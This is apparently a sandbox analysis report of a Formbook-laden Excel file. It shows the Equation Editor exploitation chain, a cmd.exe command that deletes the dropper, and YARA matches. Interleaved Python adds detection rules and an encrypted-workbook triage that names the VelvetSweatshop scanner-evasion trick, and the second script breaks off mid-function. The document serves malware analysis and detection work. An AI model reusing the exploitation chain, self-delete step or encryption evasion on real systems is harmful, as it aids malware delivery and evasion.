Source: C:\Users\Public\vbc.exe Code function: 4_2_007ED8C0 4_2_007ED8C0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E9899 4_2_007E9899
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E89C8 4_2_007E89C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E89B8 4_2_007E89B8
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E6A07 4_2_007E6A07
Source: C:\Users\Public\vbc.exe Code function: 4_2_007EDB58 4_2_007EDB58
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E8BF8 4_2_007E8BF8
Source: C:\Users\Public\vbc.exe Code function: 4_2_007EEED0 4_2_007EEED0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007EEFD0 4_2_007EEFD0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0039AC50 4_2_0039AC50
Source: C:\Users\Public\vbc.exe Code function: 4_2_00391170 4_2_00391170
Source: C:\Users\Public\vbc.exe Code function: 4_2_003912B0 4_2_003912B0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00401030 7_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B944 7_2_0041B944
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041BB84 7_2_0041BB84
Source: C:\Users\Public\vbc.exe Code function: 7_2_00408C4B 7_2_00408C4B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00408C50 7_2_00408C50
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041BCF5 7_2_0041BCF5
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C5ED 7_2_0041C5ED
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402D90 7_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B70F 7_2_0041B70F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402FB0 7_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B3E0C6 7_2_00B3E0C6
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B6D005 7_2_00B6D005
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B5905A 7_2_00B5905A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B43040 7_2_00B43040
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B3E2E9 7_2_00B3E2E9
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BE1238 7_2_00BE1238
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B663DB 7_2_00B663DB
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B3F3CF 7_2_00B3F3CF
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B42305 7_2_00B42305
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8A37B 7_2_00B8A37B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B47353 7_2_00B47353
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B75485 7_2_00B75485
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B51489 7_2_00B51489
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B7D47D 7_2_00B7D47D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B5C5F0 7_2_00B5C5F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B4351F 7_2_00B4351F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B86540 7_2_00B86540
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B44680 7_2_00B44680
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B4E6C1 7_2_00B4E6C1
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BE2622 7_2_00BE2622
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B4C7BC 7_2_00B4C7BC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BC579A 7_2_00BC579A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B757C3 7_2_00B757C3
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BDF8EE 7_2_00BDF8EE
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B6286D 7_2_00B6286D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B4C85C 7_2_00B4C85C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B429B2 7_2_00B429B2
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BE098E 7_2_00BE098E
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B569FE 7_2_00B569FE
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BC5955 7_2_00BC5955
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BF3A83 7_2_00BF3A83
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BECBA4 7_2_00BECBA4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B3FBD7 7_2_00B3FBD7
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BCDBDA 7_2_00BCDBDA
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B67B00 7_2_00B67B00
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BDFDDD 7_2_00BDFDDD
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B70D3B 7_2_00B70D3B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B4CD5B 7_2_00B4CD5B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B72E2F 7_2_00B72E2F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B5EE4C 7_2_00B5EE4C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B50F3F 7_2_00B50F3F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B6DF7C 7_2_00B6DF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020A1238 9_2_020A1238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02002305 9_2_02002305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FFE0C6 9_2_01FFE0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02007353 9_2_02007353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0204A37B 9_2_0204A37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020263DB 9_2_020263DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0202D005 9_2_0202D005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FFF3CF 9_2_01FFF3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02003040 9_2_02003040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0201905A 9_2_0201905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FFE2E9 9_2_01FFE2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020A2622 9_2_020A2622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0204A634 9_2_0204A634
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02004680 9_2_02004680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0200E6C1 9_2_0200E6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0208579A 9_2_0208579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0200C7BC 9_2_0200C7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020357C3 9_2_020357C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0203D47D 9_2_0203D47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02035485 9_2_02035485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02011489 9_2_02011489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0200351F 9_2_0200351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02046540 9_2_02046540
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0201C5F0 9_2_0201C5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B3A83 9_2_020B3A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02027B00 9_2_02027B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020ACBA4 9_2_020ACBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0208DBDA 9_2_0208DBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FFFBD7 9_2_01FFFBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0200C85C 9_2_0200C85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0202286D 9_2_0202286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0209F8EE 9_2_0209F8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02085955 9_2_02085955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020A098E 9_2_020A098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020029B2 9_2_020029B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020169FE 9_2_020169FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02032E2F 9_2_02032E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0201EE4C 9_2_0201EE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02010F3F 9_2_02010F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0202DF7C 9_2_0202DF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02030D3B 9_2_02030D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0200CD5B 9_2_0200CD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0209FDDD 9_2_0209FDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009C5ED 9_2_0009C5ED
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009B944 9_2_0009B944
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009BB84 9_2_0009BB84
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00088C4B 9_2_00088C4B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00088C50 9_2_00088C50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009BCF5 9_2_0009BCF5
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00082FB0 9_2_00082FB0
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Payment.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 00B83F92 appears 108 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00BAF970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00B8373B appears 238 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00B3DF5C appears 118 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00B3E2A8 appears 38 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 01FFDF5C appears 118 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 0204373B appears 238 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 02043F92 appears 108 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 0206F970 appears 81 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 01FFE2A8 appears 38 times
PE file contains executable resources (Code or Archives)
Source: so[1].exe.2.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Yara signature match
Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: so[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@14/8@7/7
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Payment.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF288.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: Payment.xlsx Virustotal: Detection: 18%
Source: Payment.xlsx ReversingLabs: Detection: 10%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
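The process tree above is the Equation Editor exploitation chain end to end: EQNEDT32.EXE spawns C:\Users\Public\vbc.exe, vbc.exe re-launches itself, starts NAPSTAT.EXE, and the chain ends with cmd.exe deleting the dropper. The Python below is an added example, not code from the Joe Sandbox report, that encodes the three process-creation rules a practitioner would write for this chain (Equation Editor spawning anything, execution from a world-writable staging folder, and a system binary running cmd.exe to delete a file under \Users\) and runs them over a constructed Sysmon Event ID 1 log shaped like this tree. The PIDs, the record field names and the benign control event are assumptions for illustration; only the images and command lines come from the report.

```python
"""Flag the Equation Editor -> dropper -> self-delete chain in Sysmon Event ID 1 records.

Added example: the records below are constructed to mirror the process tree in the
report; they are not captured telemetry.
"""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass

# Constructed Sysmon ProcessCreate records reduced to the fields the rules need.
# PIDs are assumptions; only the images and command lines come from the report.
EVENTS = [
    {"pid": 1580, "ppid": 900, "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmd": r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"},
    {"pid": 2392, "ppid": 900, "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmd": r"'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding"},
    {"pid": 2872, "ppid": 2392, "image": r"C:\Users\Public\vbc.exe", "cmd": r"'C:\Users\Public\vbc.exe'"},
    {"pid": 2908, "ppid": 2872, "image": r"C:\Users\Public\vbc.exe", "cmd": r"C:\Users\Public\vbc.exe"},
    {"pid": 3120, "ppid": 2908, "image": r"C:\Windows\SysWOW64\NAPSTAT.EXE", "cmd": r"C:\Windows\SysWOW64\NAPSTAT.EXE"},
    {"pid": 3144, "ppid": 3120, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmd": r"/c del 'C:\Users\Public\vbc.exe'"},
    # Benign control: an interactive user starting an editor from their own profile.
    {"pid": 4000, "ppid": 900, "image": r"C:\Users\user\AppData\Local\Programs\code.exe", "cmd": "code.exe"},
]

# World-writable staging folders that normal software is not launched from.
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Office helper binaries that have no legitimate reason to spawn children.
OFFICE_HELPERS = {"eqnedt32.exe"}
# System binaries that should not be the parent of a 'del' inside a user profile.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    image: str
    detail: str = ""


def detect(events: list[dict]) -> list[Alert]:
    by_pid = {e["pid"]: e for e in events}
    alerts: list[Alert] = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        image = e["image"].lower()
        name = ntpath.basename(image)
        # Rule 1: Equation Editor spawned a child (the CVE-2017-11882 / CVE-2018-0802 pattern).
        if parent and ntpath.basename(parent["image"].lower()) in OFFICE_HELPERS:
            alerts.append(Alert("office_helper_spawn", e["pid"], e["image"], f"parent={parent['image']}"))
        # Rule 2: execution from a world-writable staging folder.
        if image.startswith(SUSPICIOUS_DIRS):
            alerts.append(Alert("exec_from_suspicious_folder", e["pid"], e["image"]))
        # Rule 3: cmd.exe deleting a file under \Users\, launched by a system binary:
        # the loader erasing the dropper once it has moved into NAPSTAT.EXE.
        if name == "cmd.exe" and re.search(r"\bdel\b.*\\users\\", e["cmd"], re.IGNORECASE):
            if parent and parent["image"].lower().startswith(SYSTEM_DIRS):
                alerts.append(Alert("lolbin_self_delete", e["pid"], e["image"], e["cmd"]))
    return alerts


def rules_hit(events: list[dict]) -> list[str]:
    return sorted({a.rule for a in detect(events)})


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"{a.rule:<28} pid={a.pid:<5} {a.image} {a.detail}")
```

Rule 1 is the high-confidence one: the Equation Editor is an OLE server that renders equations and never needs a child process, so any child is exploitation regardless of what the child is called. Rules 2 and 3 are broader and exist to catch the same loader when the dropper name or the Office helper changes.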
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: Payment.xlsx Static file information: File size 1363456 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
Source: Binary string: napstat.pdb source: vbc.exe, 00000007.00000003.2227630571.00000000007DE000.00000004.00000001.sdmp
Source: Payment.xlsx Initial sample: OLE indicators vbamacros = False
Source: Payment.xlsx Initial sample: OLE indicators encrypted = True
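Read together, "OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false", "vbamacros = False" and "encrypted = True" describe an OOXML workbook wrapped in an OLE container whose only payload is a high-entropy EncryptedPackage stream (the Boot Survival section reports 7.9998 bits per byte for it). Excel opens such a file without any prompt when it was encrypted with Excel's built-in default password VelvetSweatshop, while a static scanner sees only ciphertext and reports no macros, no Workbook stream and nothing to flag. The Python below is an added example, not part of the report, that reproduces this triage: a Shannon entropy function, a verdict over a stream table, and a deterministic constructed stream table standing in for the real sample. The stream-name lists and the constructed data are assumptions.

```python
"""Triage an OLE container whose only payload stream is EncryptedPackage.

Added example: the stream table produced by constructed_sample() is synthetic and only
mimics the report's findings; nothing here is read from the real Payment.xlsx.
"""
from __future__ import annotations

import math
import random
from collections import Counter

# Stream names the usual OLE indicators look for (assumption: the oletools-style set).
LEGACY_STREAMS = {"Workbook", "Book", "WordDocument", "PowerPoint Document", "VisioDocument"}
VBA_MARKER = "VBA"
DEFAULT_OFFICE_PASSWORD = "VelvetSweatshop"  # Excel's built-in default; Excel decrypts with it silently.
HIGH_ENTROPY = 7.9                          # bits per byte; encrypted or compressed data sits near 8


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in 0.0 .. 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(streams: dict[str, bytes]) -> dict:
    """Mirror the report's three indicators and decide whether decryption must precede scanning."""
    names = set(streams)
    has_legacy = bool(names & LEGACY_STREAMS)
    has_vba = any(VBA_MARKER in n for n in names)
    encrypted = {"EncryptionInfo", "EncryptedPackage"} <= names
    entropy = round(shannon_entropy(streams.get("EncryptedPackage", b"")), 4)
    verdict = {
        "ole_indicators_all_false": not has_legacy,
        "vbamacros": has_vba,
        "encrypted": encrypted,
        "encrypted_package_entropy": entropy,
        "likely_velvetsweatshop": False,
        "next_step": "static scan is representative",
    }
    # No legacy streams, no VBA, and a near-8.0 EncryptedPackage: the scanner is looking at
    # ciphertext. Excel will still open the file with no prompt if the default password was
    # used, so decrypt with it first and rescan the inner OOXML package.
    if encrypted and not has_legacy and entropy > HIGH_ENTROPY:
        verdict["likely_velvetsweatshop"] = True
        verdict["next_step"] = (f"decrypt with password {DEFAULT_OFFICE_PASSWORD!r} "
                                "(msoffcrypto-tool in.xlsx out.xlsx -p VelvetSweatshop), then rescan")
    return verdict


def constructed_sample() -> dict[str, bytes]:
    """Deterministic stand-in for the encrypted workbook's stream table (constructed data)."""
    rng = random.Random(404048)
    return {
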